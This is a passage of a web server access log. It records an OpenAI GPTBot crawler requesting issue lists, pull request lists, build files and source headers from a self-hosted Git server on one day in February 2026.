GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:58:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:58:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:58:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:58:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:58:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:58:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:58:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:58:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:58:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:58:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:58:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:58:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.assets.json?display=rendered" [Client 74.7.227.38] [Length 11175] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" +[17/Feb/2026:18:58:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:18:58:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:18:58:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:18:58:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:18:58:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:18:58:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:18:58:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:18:58:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:58:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:18:58:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:58:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:58:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/build.ninja?display=source" [Client 74.7.227.38] [Length 16431] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:18:58:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11635] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:58:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18928] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:58:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/build.ninja?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:18:58:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:58:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:58:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:58:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:58:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:58:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:58:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15847] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:18:58:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/main.py?display=source" [Client 74.7.227.38] [Length 25659] [Gzip 7.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/main.py" +[17/Feb/2026:18:58:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10922] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp" +[17/Feb/2026:18:58:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:58:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:58:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:58:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:58:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:58:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10090] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:58:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:58:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:58:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:58:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:58:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:18:58:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:18:58:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:18:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:18:58:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:18:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:18:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12720] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:18:58:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11651] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:18:58:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 12045] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:18:58:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12236] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:18:58:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13345] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" 